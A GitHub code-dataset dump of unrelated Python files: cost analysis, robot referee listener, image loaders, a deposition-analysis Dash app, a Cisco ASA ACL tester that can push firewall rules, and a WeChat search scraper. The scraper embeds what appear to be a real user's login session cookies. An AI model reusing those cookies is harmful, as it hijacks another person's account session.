propertiesR .... propertiesP]\n# '''\n# allPairsCodified= super(StructProtocol,self).applyProtocol( prefixComplex, prefixL, prefixR)\n# allPairsCodified= self.addProductTerms(allPairsCodified)\n# allPairsCodified= self.reorderColumns(allPairsCodified)\n# return allPairsCodified\n\n","repo_name":"rsanchezgarc/BIPSPI","sub_path":"codifyComplexes/codifyProtocols/StructProtocol.py","file_name":"StructProtocol.py","file_ext":"py","file_size_in_byte":7332,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"40489151657","text":"'''\nThis file contains the code for the cost optimization analysis. The code takes the results of\nrunning a bag of task on t2.large and g4dn.xlarge instance types and determines cost-efficient\nconfiguration for this workload.\n'''\n\nimport pandas as pd\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom matplotlib.patches import Rectangle\n\n\ndef read_results(path_to_results='analysis/results/experiment_1_hete'):\n instance_codes = os.listdir(path_to_results)\n results = pd.DataFrame(columns=['t2.large', 'g4dn.xlarge', 'price', 'throughput'])\n for instance_code in instance_codes:\n instances = {'t2.large': int(instance_code.split('_')[0]),\n 'c5.2xlarge': int(instance_code.split('_')[1]),\n 'g4dn.xlarge': int(instance_code.split('_')[2])\n }\n if instances['c5.2xlarge'] != 0:\n continue\n path_to_file = f\"{path_to_results}/{instance_code}\"\n result_files = os.listdir(path_to_file)\n throughputs = []\n for file in result_files:\n result = pd.read_csv(f'{path_to_file}/{file}')\n throughput = result['completion_time'].count() / (0.001*result['completion_time'].max())\n throughputs.append(throughput)\n throughput = np.mean(throughputs)\n d = {'t2.large': instances['t2.large'],\n 'g4dn.xlarge': instances['g4dn.xlarge'],\n 'price': round(instances['t2.large']*0.0928 + instances['g4dn.xlarge']*0.526, 4),\n 'throughput': round(throughput, 2)\n }\n results = pd.concat([results, pd.DataFrame(d, index=[0])], axis=0)\n results.to_csv('analysis/tables/experiment_1_hete/cost_optimization.csv', index=False)\n return results\n\n\n\nthreshold = 125.0\nresults = read_results()\nresults = results.sort_values(by=['throughput'])\nsatisfactory_throughput = results[results['throughput'] >= threshold]\nmin_price = satisfactory_throughput['price'].min()\nmin_price_config = satisfactory_throughput[satisfactory_throughput['price'] == min_price]\noptimum_point = (min_price_config['throughput'].values[0], min_price_config['price'].values[0])\n\nresults = results.loc[(results['t2.large']<14) & (results['g4dn.xlarge']>0)]\n\nfor point in zip(results['throughput'], results['price']):\n if point == optimum_point:\n plt.scatter(point[0], point[1], color='yellow', marker='*', edgecolors='black', s=200)\n plt.annotate(f't2.large:{min_price_config[\"t2.large\"].values[0]}' +\n f'\\ng4dn.xlarge:{min_price_config[\"g4dn.xlarge\"].values[0]}',\n xy=point, xytext=(8, -15), textcoords='offset points', ha='left', va='bottom')\n else:\n plt.scatter(point[0], point[1], color='red' if point[0] < threshold else 'green',\n marker='x' if point[0] < threshold else 'o')\n\nplt.xlabel('Throughput (tasks/s)')\nplt.ylabel('Price ($/h)')\nplt.savefig('analysis/figures/experiment_1_hete/cost_optimization_2.pdf', dpi=300, bbox_inches='tight')\nplt.show()\n\nprices = np.zeros((results['t2.large'].max()+1, results['g4dn.xlarge'].max())) # 2D array of prices\nthroughputs = np.zeros((results['t2.large'].max()+1, 
results['g4dn.xlarge'].max())) # 2D array of throughputs\n\nfor row in results.itertuples():\n if row[2] == 0 or row[1] > 13:\n continue\n prices[row[1], row[2]-1] = row[3]\n throughputs[row[1], row[2]-1] = row[4]\n\nf, ax = plt.subplots()\nax = sns.heatmap(throughputs, cmap='hot_r', linewidths=0.5, annot=prices, fmt='.3f',\n cbar_kws={'label': 'throughput (tasks/s)'})\n\nax.add_patch(Rectangle((1, 0), 1, 1, fill=False, edgecolor='blue', lw=3))\n\n\n\nplt.xticks(np.arange(0.5, throughputs.shape[1]+0.5, 1), np.arange(1, throughputs.shape[1]+1, 1))\nplt.xlabel('Number of g4dn.xlarge')\nplt.ylabel('Number of t2.large')\nplt.savefig('analysis/figures/experiment_1_hete/cost_optimization_heatmap_2.pdf', dpi=300, bbox_inches='tight')\nplt.show()\n","repo_name":"hpcclab/heterogeneity_measure","sub_path":"analysis/cost_optimization.py","file_name":"cost_optimization.py","file_ext":"py","file_size_in_byte":3960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71521097680","text":"from threading import Thread\nimport json\nfrom src import config\n\n\nclass Referee:\n\n def listen(self):\n while True:\n message = self.ws.recv()\n if message != \"\":\n command = json.loads(message)\n\n if command[\"signal\"] == \"stop\" and self.robotID in command[\"targets\"]:\n self.go = False\n elif command[\"signal\"] == \"start\" and self.robotID in command[\"targets\"]:\n index = command[\"targets\"].index(self.robotID)\n color = command[\"baskets\"][index]\n self.basketColor = color\n self.go = True\n else:\n pass\n\n def __init__(self, ws):\n # Params\n self.parser = config.config()\n self.go = False\n self.stopped = False\n self.robotID = self.parser.get(\"Game\", \"robotID\")\n self.basketColor = \"\"\n # Server address\n self.ws = ws\n # Start Thread\n self.w = Thread(name='refereeThread', target=self.listen)\n self.w.start()\n\n def stop(self):\n self.stopped = True\n","repo_name":"KirillAnohin/True-Randomness","sub_path":"src/referee.py","file_name":"referee.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8820074954","text":"\"\"\"This function loads .lsm or .tif data file (just one).\n\nGiven the filename as input, the output are the matrices of the maximum intensity\nprojection of red and green channels (nuclei and spots respectively).\n\"\"\"\n\nimport numpy as np\nimport tifffile\nfrom PyQt5 import QtGui, QtWidgets\n\n\nclass LoadLsmOrTif5D:\n def __init__(self, fname, nucs_spts_ch):\n\n file_array = tifffile.imread(fname) # load file\n steps, z, c, x_len, y_len = file_array.shape # shape info\n\n pbar = ProgressBar(total1=steps)\n pbar.show()\n\n red_mtx = np.zeros((steps, x_len, y_len)) # initialization of nuclei matrix\n green_mtx = np.zeros((steps, x_len, y_len)) # initialization of spots matrix\n\n for t in range(steps):\n pbar.update_progressbar(t)\n for x in range(x_len):\n red_mtx[t, x, :] = file_array[t, :, nucs_spts_ch[0], x, :].max(0) # maximum intensity projection\n green_mtx[t, x, :] = file_array[t, :, nucs_spts_ch[1], x, :].max(0) # maximum intensity projection\n\n\n self.red_mtx = red_mtx\n self.green_mtx = green_mtx\n\n\nclass ProgressBar(QtGui.QWidget):\n def __init__(self, parent=None, total1=20):\n super(ProgressBar, self).__init__(parent)\n self.name_line1 = QtGui.QLineEdit()\n\n self.progressbar = QtWidgets.QProgressBar()\n self.progressbar.setMinimum(1)\n self.progressbar.setMaximum(total1)\n\n\n main_layout = 
QtGui.QGridLayout()\n main_layout.addWidget(self.progressbar, 0, 0)\n\n self.setLayout(main_layout)\n self.setWindowTitle(\"Progress\")\n self.setGeometry(500, 300, 300, 50)\n\n\n def update_progressbar(self, val1):\n self.progressbar.setValue(val1)\n QtWidgets.qApp.processEvents()\n","repo_name":"ant-trullo/MitoTrack_v4_0","sub_path":"LoadLsmOrTif5D.py","file_name":"LoadLsmOrTif5D.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"74470795282","text":"\nimport os\n\nimport numpy as np\nfrom scipy import misc\nimport glob\n\ndef load_data(path, training_data_file, num_results):\n\ttraining_data = []\n\n\ttraining_path = os.path.normpath(os.path.join(path, training_data_file))\n\n\tf = open(training_path, 'r')\n\tfor line in f:\n\n\t\tline = line.strip(\"\\n\")\n\t\t\n\t\tlineParts = line.split(\" \")\n\n\t\tvalue = lineParts[0]\n\t\tdirectory = lineParts[1]\n\n\t\tvalue_path = os.path.normpath(os.path.join(path, directory))\n\n\t\tpng_path = os.path.normpath(os.path.join(value_path, '*.png'))\n\n\t\t# Get list of files in each directory and read them in.\n\t\tfor image_filename in glob.glob(png_path):\n\t\t\timage = misc.imread(image_filename, True)\n\n\t\t\ttraining_data.append(tuple((value, image)))\n\n\treturn training_data\n\ndef load_notes_data(path, training_data_file, num_results):\n\ttraining_data = load_data(path, training_data_file, num_results)\n\n\twrapped_data = []\n\tfor t in training_data:\n\t\twrapped_data.append(tuple((vectorized_result(int(t[0]), num_results), t[1])))\n\n\treturn wrapped_data\n\ndef vectorized_result(j, num_results):\n\te = np.zeros(num_results)\n\te[j] = 1.0\n\treturn e","repo_name":"kfreezen/shaped-note-recognizer","sub_path":"training_data_loader.py","file_name":"training_data_loader.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"17259471133","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output, State\n\nimport os\nimport re\nimport numpy as np\nimport pandas as pd\n\nimport pickle\nimport textwrap # for wrapping text for plotly charts\n\nimport tensorflow_hub as hub\nimport umap\nimport hdbscan\nfrom sklearn.metrics import silhouette_score\n\nimport plotly.express as px\n\nexternal_stylesheets = [\"https://codepen.io/chriddyp/pen/bWLwgP.css\"]\n\napp = dash.Dash(external_stylesheets=external_stylesheets)\n\ndir_name = \"/project/data_preprocessed_csv/\"\ndf_metadata = pd.read_csv(\"/project/preprocessing/metadata.csv\", index_col=0)\ncounts = df_metadata.groupby(\"case\").case.count()\ncases = counts[counts > 1].index.values\ndf_lawyers = pd.read_csv(\"/project/eda/lawyers_stats.csv\", index_col=0)\nembed = hub.load(\"https://tfhub.dev/google/universal-sentence-encoder/4\")\n\napp.layout = html.Div(\n [\n html.H1(\"Deposition Analyser\"),\n html.H3(\"Question Visualiser\"),\n html.P(\n \"After you select a case and click 'Create visualisation' (and after a bit of time, should be under 20 seconds)\"\n \" an interactive visualisation should appear. Questions which have a similar mean\"\n \"ing will appear closer together. You can hover over the points to reveal the questions. 
You can\"\n \" zoom in by dragging a rectangle over the part of the graph you want to zoom in on.\"\n \" You can reset the plot by clicking the icon in the shape of a house in the top-right.\"\n ),\n html.Div(\n dcc.Dropdown(\n id=\"case_selection\",\n options=[{\"label\": case, \"value\": case} for case in cases],\n value=cases[0],\n style={\"width\": \"80%\"},\n )\n ),\n html.Button(\"Create visualisation\", id=\"visualisation_button\"),\n dcc.Graph(id=\"question-cluster-graph\"),\n html.H3(\"Similar question finder\"),\n html.P(\n \"After selecting a case, you can enter\"\n \" a question in the box below. You will then be showed the top 10 most similar questions \"\n \" along with their answers, and a 'similarity score' that shows how much the algorithms think\"\n \" the given questions are similar to the question you entered.\"\n ),\n dcc.Textarea(\n id=\"users_question\",\n placeholder=\"Enter a question...\",\n style={\"width\": \"100%\"},\n ),\n html.Button(\"Find similar questions\", id=\"similar_questions_button\"),\n html.P(id=\"similar_questions\", style={'marginBottom': '5em'}),\n html.H3(\"Lawyer Stats\"),\n html.P(\n \"This tool produces statistics that allow you to compare how different lawyers ask\"\n \" questions.\"\n ),\n html.Div(\n dcc.Dropdown(\n id=\"statistic_selection\",\n options=[\n {\"label\": \"Average words per question\", \"value\": \"av_num_words\"},\n {\"label\": \"Objection ratio\", \"value\": \"objection_ratio\"},\n {\"label\": \"Strike ratio\", \"value\": \"strike_ratio\"},\n ],\n value=\"Please select a statistic\",\n style={\"width\": \"80%\"},\n )\n ),\n html.P(id=\"lawyer_stats\", style={'marginBottom': '5em'}),\n html.Div(children=\"\", id=\"intermediate-data\", style={\"display\": \"none\"}),\n ],\n className=\"app-site\",\n)\n\n\n@app.callback(\n [\n Output(\"question-cluster-graph\", \"figure\"),\n Output(\"intermediate-data\", \"children\"),\n ],\n Input(\"visualisation_button\", \"n_clicks\"),\n State(\"case_selection\", \"value\"),\n)\ndef process_case_and_create_plot(n, case_selection):\n if not n:\n return empty_plot()\n\n print(case_selection)\n\n filenames = df_metadata.loc[df_metadata.case == case_selection, \"filename\"].values\n\n # corpus = []\n # for filename in filenames:\n # try:\n # df = pd.read_csv(dir_name + filename[:-3] + \"csv\", index_col=0)\n # df = df[df.text_type.isin([\"q\"])]\n # corpus += df.text.values.tolist()\n # except:\n # print(filename)\n\n # loop through files to create frame containing all questions and answers\n df_aq = pd.DataFrame(columns=[\"text\", \"text_type\", \"filename\"])\n for filename in filenames:\n df_individual_aq = pd.DataFrame(columns=[\"text\", \"text_type\", \"filename\"])\n\n df_individual_full = pd.read_csv(dir_name + filename[:-3] + \"csv\", index_col=0)\n indices = df_individual_full.text_type.isin([\"a\", \"q\"])\n\n df_individual_aq[\"text\"] = df_individual_full.loc[indices, \"text\"]\n df_individual_aq[\"text_type\"] = df_individual_full.loc[indices, \"text_type\"]\n df_individual_aq[\"filename\"] = filename[:-4]\n\n df_aq = pd.concat([df_aq, df_individual_aq], axis=0, ignore_index=True)\n\n # for each question, determine if it was answered\n # if yes, add that answer to new column\n indices = (df_aq.text_type == \"q\") & (df_aq.text_type.shift(-1) == \"a\")\n indices_a = indices.shift(1)\n indices_a[0] = False\n df_aq.loc[indices, \"answer\"] = df_aq.loc[indices_a, \"text\"].values\n df_q = df_aq.loc[df_aq.text_type == \"q\", [\"text\", \"answer\", \"filename\"]]\n\n # vectorise 
corpus using Univeral Sentence Embedding\n df_q[\"vectors\"] = embed(df_q.text).numpy().tolist()\n\n vectors_dim_reduced = umap.UMAP(random_state=0).fit_transform(df_q.vectors.tolist())\n df_q[\"x\"] = vectors_dim_reduced[:, 0]\n df_q[\"y\"] = vectors_dim_reduced[:, 1]\n\n df_q[\"clusters\"] = hdbscan.HDBSCAN().fit(vectors_dim_reduced).labels_\n\n # indices = clusters > -1\n\n df_plot = pd.DataFrame(vectors_dim_reduced, columns=[\"x\", \"y\"])\n df_plot[\"Text\"] = df_q.text.values\n df_plot[\"cluster\"] = df_q.clusters.values\n\n # need to manually wrap text for plotly, using html newline tags\n df_plot.Text = df_plot.Text.apply(\n lambda txt: \"
\".join(textwrap.wrap(str(txt), width=30))\n )\n\n df_plot = df_plot[df_plot.cluster > -1]\n\n fig = px.scatter(\n df_plot,\n x=\"x\",\n y=\"y\",\n hover_data=dict(x=False, y=False, Text=True, cluster=False),\n width=600,\n height=600,\n color=\"cluster\",\n color_continuous_scale=\"rainbow\",\n )\n\n fig.update(layout_coloraxis_showscale=False)\n fig.update_layout(\n plot_bgcolor=\"rgba(0, 0, 0, 0)\",\n title=f\"Visualising the questions from the case {case_selection}\",\n )\n\n fig.update_xaxes(\n linecolor=\"black\",\n mirror=True,\n title=None,\n showticklabels=False,\n linewidth=2,\n )\n fig.update_yaxes(\n linecolor=\"black\",\n mirror=True,\n title=None,\n showticklabels=False,\n linewidth=2,\n )\n\n print(case_selection)\n return fig, df_q.to_json(date_format=\"iso\", orient=\"split\")\n\n\n@app.callback(\n Output(\"similar_questions\", \"children\"),\n Input(\"similar_questions_button\", \"n_clicks\"),\n [State(\"intermediate-data\", \"children\"), State(\"users_question\", \"value\")],\n)\ndef find_similar_questions(n, data, question):\n if not n:\n return \"\"\n if not data:\n return \"Please select a case first\"\n\n df = pd.read_json(data, orient=\"split\")\n\n q_vector = embed([question])[0].numpy()\n vectors = np.array(df.vectors.tolist())\n df[\"similarity\"] = vectors @ q_vector.T\n df.sort_values(by=\"similarity\", axis=0, ascending=False, inplace=True)\n\n similar_questions_list = []\n for i in range(10):\n index = df.index[i]\n similarity = df.loc[index, \"similarity\"]\n question = df.loc[index, \"text\"]\n answer = df.loc[index, \"answer\"]\n filename = df.loc[index, \"filename\"]\n\n similar_questions_list.append(f\"Question similarity score: {similarity}\")\n similar_questions_list.append(html.Br())\n similar_questions_list.append(f\"Question: {question}\")\n similar_questions_list.append(html.Br())\n similar_questions_list.append(f\"Answer: {answer}\")\n similar_questions_list.append(html.Br())\n similar_questions_list.append(f\"Deposition: {filename}\")\n similar_questions_list.append(html.Br())\n similar_questions_list.append(html.Br())\n\n return similar_questions_list\n\n\n@app.callback(\n Output(\"lawyer_stats\", \"children\"),\n Input(\"statistic_selection\", \"value\"),\n)\ndef produce_lawyer_stats(statistic):\n if statistic == 'Please select a statistic':\n return statistic\n\n top10 = df_lawyers.loc[\n df_lawyers.num_questions > 20, [statistic]\n ].sort_values(by=statistic, axis=0, ascending=False).head(10)\n\n bottom10 = df_lawyers.loc[\n df_lawyers.num_questions > 20, [statistic]\n ].sort_values(by=statistic, axis=0, ascending=True).head(10)\n\n lawyer_stats = []\n\n lawyer_stats.append(html.H6('Highest 10'))\n for i in range(10):\n lawyer_stats.append(f'{round(top10[statistic][i],2)} -- {top10.index[i]}')\n lawyer_stats.append(html.Br())\n lawyer_stats.append(html.Br())\n \n lawyer_stats.append(html.H6('Lowest 10'))\n for i in range(10):\n lawyer_stats.append(f'{round(bottom10[statistic][i],2)} -- {bottom10.index[i]}')\n lawyer_stats.append(html.Br())\n lawyer_stats.append(html.Br())\n\n return lawyer_stats\n\n\n\ndef empty_plot():\n fig = px.scatter(\n pd.DataFrame(columns=[\"x\", \"y\"]),\n x=\"x\",\n y=\"y\",\n width=600,\n height=600,\n )\n\n fig.update(layout_coloraxis_showscale=False)\n fig.update_layout(\n plot_bgcolor=\"rgba(0, 0, 0, 0)\",\n title=f\"Empty plot. 
Please select a case\",\n )\n\n fig.update_xaxes(\n linecolor=\"black\",\n mirror=True,\n title=None,\n showticklabels=False,\n linewidth=2,\n )\n fig.update_yaxes(\n linecolor=\"black\",\n mirror=True,\n title=None,\n showticklabels=False,\n linewidth=2,\n )\n\n return fig, None\n\n\nif __name__ == \"__main__\":\n app.run_server(debug=True, port=8888)","repo_name":"pranshukapri/lovekush-codebase","sub_path":"codebase-lovkush/dash_app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71461142800","text":"import os\nimport re\nimport sys\nimport yaml\nimport pyperclip\nfrom getpass import getpass\nfrom netmiko import ConnectHandler\n\n\ndef packet_tracer(device_name, acl_entries_final):\n '''Test an ASA access-list and add missing entries to it if needed'''\n\n os.system('color')\n ALLOWED = '\\x1b[6;30;42m' + 'ALLOWED!' + '\\x1b[0m'\n DENIED = '\\x1b[6;37;41m' + 'DENIED!' + '\\x1b[0m'\n\n ace_first = acl_entries_final[0]\n src_ip = re.search(r'(tcp|udp).*?(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})', ace_first).group(2)\n\n net_connect = ConnectHandler(**device_name)\n\n output_show_route = net_connect.send_command('sh route {}'.format(src_ip))\n for i in output_show_route.splitlines():\n intf_match = re.search(r'via ([a-zA-Z0-9_-]+$)', i)\n if intf_match:\n pkt_tracer_intf = intf_match.group(1)\n print('\\nInbound interface name:', pkt_tracer_intf)\n break\n else:\n output_show_route = net_connect.send_command('sh route 0.0.0.0')\n for i in output_show_route.splitlines():\n intf_match = re.search(r'via ([a-zA-Z0-9_-]+$)', i)\n if intf_match:\n pkt_tracer_intf = intf_match.group(1)\n print('\\nInbound interface name:', pkt_tracer_intf)\n break\n\n packet_tracer_commands = []\n for ace in acl_entries_final:\n components = re.search(r'(tcp|udp).*?'\n '(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}).*?'\n '(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}).*?'\n '(\\d+)', ace)\n \n packet_tracer_commands.append('packet-tracer input {} {} {} 10240 {} {} xml'.format(\n pkt_tracer_intf,\n components.group(1),\n components.group(2),\n components.group(3),\n components.group(4)))\n output_sh_run_acl_group = net_connect.send_command('sh run access-group')\n regex_pattern = r'access-group ([a-zA-Z0-9_-]+) in interface {}$'.format(pkt_tracer_intf)\n for i in output_sh_run_acl_group.splitlines():\n intf_match = re.search(regex_pattern, i)\n if intf_match:\n acl_name = intf_match.group(1)\n print('ACL name:', intf_match.group(1), '\\n')\n break\n \n acl_to_configure = []\n for index, command_entry in enumerate(packet_tracer_commands):\n output = net_connect.send_command(command_entry)\n for line in output.splitlines():\n search_result = re.search(r'(\\w+)', line)\n if search_result:\n if search_result.group(1) == 'allow':\n print(f'{command_entry} --> {ALLOWED}')\n for line_x in output.splitlines():\n search_result_x = re.search(r'access-list.*', line_x)\n if search_result_x:\n print('\\t', search_result_x.group())\n print()\n break\n for line in output.splitlines():\n search_result_nat = re.search(r'Untranslate\\s+([0-9.]+)/.+to\\s+([0-9.]+)/', line)\n if search_result_nat and (search_result_nat.group(1) != search_result_nat.group(2)):\n print(f'\\t\\tNAT to {search_result_nat.group(2)} performed.\\n')\n elif search_result.group(1) == 'drop':\n print(f'{command_entry} --> {DENIED}')\n for line_y in output.splitlines():\n search_result_y = re.search(r'(.+)', line_y)\n if 
search_result_y:\n print('\\t Reason:', search_result_y.group(1))\n print()\n break\n for line in output.splitlines():\n search_result_nat = re.search(r'Untranslate\\s+([0-9.]+)/.+to\\s+([0-9.]+)/', line)\n if search_result_nat and (search_result_nat.group(1) != search_result_nat.group(2)):\n print(f'\\t\\tNAT to {search_result_nat.group(2)} required.\\n')\n acl_to_configure.append(re.sub(r'(host.*host) ([0-9.]+)',\n r'\\1 ' + f'{search_result_nat.group(2)}',\n acl_entries_final[index]))\n break\n else:\n acl_to_configure.append(acl_entries_final[index])\n else:\n print(f'{command_entry} --> UNKNOWN ACTION')\n\n if len(acl_to_configure) == 0:\n print('\\nNo additional access-list entries need to be configured.')\n else:\n print('\\n\\nThe following ACL entries should be configured:\\n')\n acl_name_replacement = r'access-list {} '.format(acl_name)\n config_commands = []\n for ace in acl_to_configure:\n ace_final = re.sub(r'access-list ([a-zA-Z0-9_-]+) ', acl_name_replacement, ace)\n config_commands.append(ace_final)\n print(ace_final)\n\n full_access_answer = input('\\nWould you like to add full TCP/UDP acceess for these access rules (default - NO, y - YES)?:')\n print()\n config_commands_temp = []\n if full_access_answer == 'y':\n for line in config_commands:\n config_commands_temp.append(line.split()[:-2])\n config_commands.clear()\n for line in config_commands_temp:\n config_commands.append(' '.join(line))\n config_commands = list(set(config_commands))\n for line in config_commands:\n print(line)\n\n config_answer = input(f'\\nWould you like to add these access rules to the ACL: {acl_name}? (y/n):')\n if config_answer == 'y':\n print('\\nAdding rules to the ACL and saving config...')\n net_connect.send_config_set(config_commands)\n net_connect.send_command('write memory')\n print('\\nDone.\\n')\n \n print('\\nClosing SSH session to the firewall...')\n net_connect.disconnect()\n print('Done.')\n\n\ndef main():\n username = 'ENTER_USERNAME_HERE'\n secret_pass = getpass('\\nEnter your password: ')\n \n with open(r'./net_devices.yml', 'r') as file:\n asa_params = yaml.load(file, Loader=yaml.FullLoader)\n \n acl_entries_final_range = [line for line in pyperclip.paste().splitlines() if len(line) != 0]\n print('\\nACL contains {} entries:\\n'.format(len(acl_entries_final_range)))\n for i in acl_entries_final_range:\n print(i)\n \n while True:\n answer = input('\\nWould you like to test these ACL entries with packet-tracer on a firewall (y/n): ')\n \n msg = '''\n Choose the firewall:\n \n ASA_1 ---------- 1\n ASA_2 ---------- 2\n ASA_3 ---------- 3\n \n : '''\n \n if answer == 'y':\n fw_number = int(input(msg))\n if fw_number == 1:\n print('\\nTesting on ASA_1...\\n')\n asa_params['asa_device_1']['username'] = username\n asa_params['asa_device_1']['password'] = secret_pass\n packet_tracer(asa_params['asa_device_1'], acl_entries_final_range)\n elif fw_number == 2:\n print('\\nTesting on ASA_2...\\n')\n asa_params['asa_device_2']['username'] = username\n asa_params['asa_device_2']['password'] = secret_pass\n packet_tracer(asa_params['asa_device_2'], acl_entries_final_range)\n elif fw_number == 3:\n print('\\nTesting on ASA_3...\\n')\n asa_params['asa_device_3']['username'] = username\n asa_params['asa_device_3']['password'] = secret_pass\n packet_tracer(asa_params['asa_device_3'], acl_entries_final_range)\n else:\n print('\\nBye!')\n sys.exit()\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"ghXplorer/cisco-asa-acl-tester","sub_path":"cisco_asa_acl_tester.py","file_name":"cisco_asa_acl_tester.py","file_ext":"py","file_size_in_byte":8379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13551620772","text":"#-*-coding:utf-8-*- \n#2017-9-20 JoeyChui sa517045@mail.ustc.edu.cn\n\nimport time, re, requests, json, xlwt\nfrom requests.exceptions import RequestException\n\ndef getOnePage(url, encoding = 'UTF-8', headers = {}, cookies = {}, json = False):\n try:\n response = requests.get(url, headers = headers, cookies = cookies)\n if response.status_code == 200:\n response.encoding = encoding\n if json:\n return response.json()\n return response.text\n return None\n except RequestException:\n print(\"ER:getOnePage\", url)\n return None\n\ndef reHTML(patternStr, html, first = False):\n pattern = re.compile(patternStr, re.S)\n items = re.findall(pattern, html)\n if items == []:\n return None\n if first:\n return items[0]\n return items\n\n\ndef cutdouhao(num):\n if not num:\n return ''\n result = ''\n for ele in num:\n if ele.isdigit():\n result += ele\n return result\n\ndef wtToXLS(content, filename):\n workbook = xlwt.Workbook(encoding = 'utf-8')\n booksheet = workbook.add_sheet('Sheet 1', cell_overwrite_ok = True)\n for i, rowVal in enumerate(content):\n for j, colVal in enumerate(rowVal):\n booksheet.write(i, j, colVal)\n workbook.save('%s.xls' % filename)\n return\n\nheaders = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36\",\n \"Host\": \"seixin.sogou.com\"}\ncookies = {\"Cookie\": 'CXID=CF8CB896101787C6447D59728D17B8F7; SUV=00C2A3A53AD223E35A45F4DC35442178; usid=7iRdDXk8rVSsjTxe; SUID=DE4388753765860A5A37BE390001B0DB; ad=lZllllllll2z2EcilllllVIJRallllllNYPRTklllxwlllll4Cxlw@@@@@@@@@@@; ABTEST=8|1514776687|v1; SNUID=93F4B9559F9AFE31CEF79294A0A140D2; JSESSIONID=aaafPYXMUQf_xcDTAmw8v; IPLOC=CN3205; sct=4; weixinIndexVisited=1; ppinf=5|1514778272|1515987872|dHJ1c3Q6MToxfGNsaWVudGlkOjQ6MjAxN3x1bmlxbmFtZToyNzolRTUlQjQlOTQlRTUlOEElOUIlRTglQkUlODl8Y3J0OjEwOjE1MTQ3NzgyNzJ8cmVmbmljazoyNzolRTUlQjQlOTQlRTUlOEElOUIlRTglQkUlODl8dXNlcmlkOjQ0Om85dDJsdUNvcTRJMFZYVjBZU3JxX05sbnV1VmdAd2VpeGluLnNvaHUuY29tfA; pprdig=V_IHkPcQUGLUZqolChlTcdH-iBHulRTIMqRLvrRs1KAD03qPlgmFl28fO80G6geWTysHBUFh1yAMmdSBFLnbPNeDtf58oXqf13nkAPuszKyZAh97KdhSoa78gq134Nr8Jm20hzIGbbKdJcfQFrMokiAG1Yp71XZr6Wt5TvZjoIA; sgid=04-30689591-AVpJrqBsbj0ACsRXt5icPBp4; ppmdig=15147782720000002eaf9fb9965dd6b7b90f5a232ca50164'}\n\nbigTable = [[\"candidate\", \"number\", \"url\"]]\n\nstarCandidate = ['韩雪', '黄轩', '李小璐', '张雨绮', '迪丽热巴', '黄子韬', '马天宇', '陈学冬', '马可', '唐艺昕', '窦骁', '李治廷', '鹿晗', '赵丽颖', '韩庚', '陈晓', '王一博', '张天爱', '于朦胧', '张晓晨', '宋祖儿', '贾乃亮', '蒋劲夫', '吉克隽逸', '杨蓉', '张嘉倪', '关晓彤', 'angelababy', '吴亦凡', '薛之谦', '翟天临', '杨幂', '张哲瀚', '鞠婧祎', '张歆艺', '古力娜扎', '杨洋', '张艺兴', '胡歌', '甘薇', '李易峰', '刘亦菲', '郑爽', '范冰冰', '林俊杰', '陈伟霆', '田馥甄', '周杰伦', '华晨宇', '周星驰']\nfor candidate in starCandidate:\n url = 'http://weixin.sogou.com/weixin?type=2&query=' + candidate\n #html = getOnePage(url, headers = headers, cookies = cookies)\n html = getOnePage(url)\n patternStr = 'pagebar_container.*?class=\"mun\">.*?([,\\d]+).*?<' \n item = reHTML(patternStr, html, first = True)\n number = cutdouhao(item)\n print(url, item, number)\n bigTable.append([candidate, number, url])\n time.sleep(10)\n\nwtToXLS(bigTable, 
\"meitiguanzhu\")\n","repo_name":"JoeyChui/privatecode","sub_path":"周三回去/冠影/Ranking/crawlStarMeiTiGuanZhuDuList.py","file_name":"crawlStarMeiTiGuanZhuDuList.py","file_ext":"py","file_size_in_byte":3569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71194040083","text":"\"\"\"!\nClass to represent the camera.\n\"\"\"\n\nimport cv2\nimport time\nimport numpy as np\nfrom PyQt4.QtGui import QImage\nfrom PyQt4.QtCore import QThread, pyqtSignal, QTimer\nimport rospy\nimport cv2\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image\nfrom sensor_msgs.msg import CameraInfo\nfrom apriltag_ros.msg import *\nfrom cv_bridge import CvBridge, CvBridgeError\nfrom block_detection import DetectBlocks\n\n\nclass Camera():\n \"\"\"!\n @brief This class describes a camera.\n \"\"\"\n\n def __init__(self):\n \"\"\"!\n @brief Construcfalsets a new instance.\n \"\"\"\n self.VideoFrame = np.zeros((720, 1280, 3)).astype(np.uint8)\n self.GridFrame = np.zeros((720, 1280, 3)).astype(np.uint8)\n self.DetectionFrame = np.zeros((720, 1280, 3)).astype(np.uint8)\n self.TagImageFrame = np.zeros((720, 1280, 3)).astype(np.uint8)\n self.DepthFrameRaw = np.zeros((720, 1280)).astype(np.uint16)\n \"\"\" Extra arrays for colormaping the depth image\"\"\"\n self.DepthFrameHSV = np.zeros((720, 1280, 3)).astype(np.uint8)\n self.DepthFrameRGB = np.array([])\n\n # mouse clicks & calibration variables\n self.camera_calibrated = False\n #self.intrinsic_matrix = np.eye(3)\n self.intrinsic_matrix = np.array([(896.861, 0, 660.523), 